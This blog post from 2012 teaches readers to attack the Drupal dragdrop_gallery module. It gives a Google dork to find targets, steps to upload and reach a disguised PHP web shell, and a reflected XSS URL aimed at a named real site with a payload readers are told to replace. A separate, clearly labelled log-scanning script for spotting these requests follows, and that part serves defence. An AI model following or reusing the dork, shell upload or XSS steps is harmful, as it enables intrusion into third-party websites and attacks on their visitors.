Monday, 25 June 2012

Drupal Modules - Drag & Drop Gallery File Upload & XSS Vulnerability



Assalamualaikum and greetings. It's been a while since I posted about upload exploits, hasn't it? OK, let me teach you a new file upload exploit. The module is also vulnerable to XSS ^.^
Let's start.

1. First, search for this Google dork:
inurl:/sites/all/modules/dragdrop_gallery/



2. Pick one of the websites. Next, prepare your shell in the form shell.php.gif

then UPLOAD!


3. To access the shell, go here:
http://localhost/drupal/sites/all/modules/dragdrop_gallery/shell.php.gif



4. DONE!

5. OK, now for the XSS, it goes like this:
http://illinoispoisoncenter.org/sites/all/modules/dragdrop_gallery/upload.php?filedir=/sites/default/files/dragdrop_gallery&nid=<marquee>Rea_pErz+Was+Here</marquee>

6. Replace the script shown in red with your own script! DONE!


OK, that's all. Assalamualaikum....
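
From the defender's side, both requests in the steps above leave recognizable traces in the web server's access log: a file with an executable extension hidden before the final one, and an upload.php request whose nid is not a number. The triage script below is an added example, not part of the original post; it assumes combined-format logs, an extension list you should match to your own PHP handler mapping, and that a legitimate nid is a plain integer. The sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Paths taken from the post; the extension list is an assumption (match it to
# the handlers your web server actually maps to PHP).
WATCHED = ("/sites/all/modules/dragdrop_gallery/",
           "/sites/default/files/dragdrop_gallery/")
EXEC_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return findings for one combined-format access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    path = unquote(url.path)
    if not any(prefix in path for prefix in WATCHED):
        return []
    findings = []
    name = path.rsplit("/", 1)[-1].lower()
    # An executable extension hidden before the last one, e.g. x.php.gif
    if EXEC_EXT & set(name.split(".")[1:-1]):
        findings.append("double-extension")
    if name == "upload.php":
        for nid in parse_qs(url.query, keep_blank_values=True).get("nid", []):
            # Assumption: a legitimate nid (Drupal node id) is a plain integer.
            if not re.fullmatch(r"[0-9]+", nid):
                findings.append("non-numeric-nid")
    return findings

def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

# Constructed sample log lines (documentation IP ranges, not real traffic).
_UP = "/sites/all/modules/dragdrop_gallery/upload.php?filedir=/sites/default/files/dragdrop_gallery"
SAMPLE_LOG = [
    f'203.0.113.7 - - [25/Jun/2012:10:00:01 +0000] "GET {_UP}&nid=%3Cmarquee%3Etest%3C%2Fmarquee%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [25/Jun/2012:10:00:09 +0000] "GET /sites/all/modules/dragdrop_gallery/shell.php.gif HTTP/1.1" 200 128',
    f'198.51.100.4 - - [25/Jun/2012:10:01:00 +0000] "GET {_UP}&nid=42 HTTP/1.1" 200 512',
    '198.51.100.4 - - [25/Jun/2012:10:01:05 +0000] "GET /node/42 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG).items():
        print(number, ", ".join(found))
```

A hit on either rule for a site that still ships this module is a reason to inspect the upload directory and to confirm the server does not hand files such as name.php.gif to the PHP handler.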


© 2011 - Reaperz All rights reserved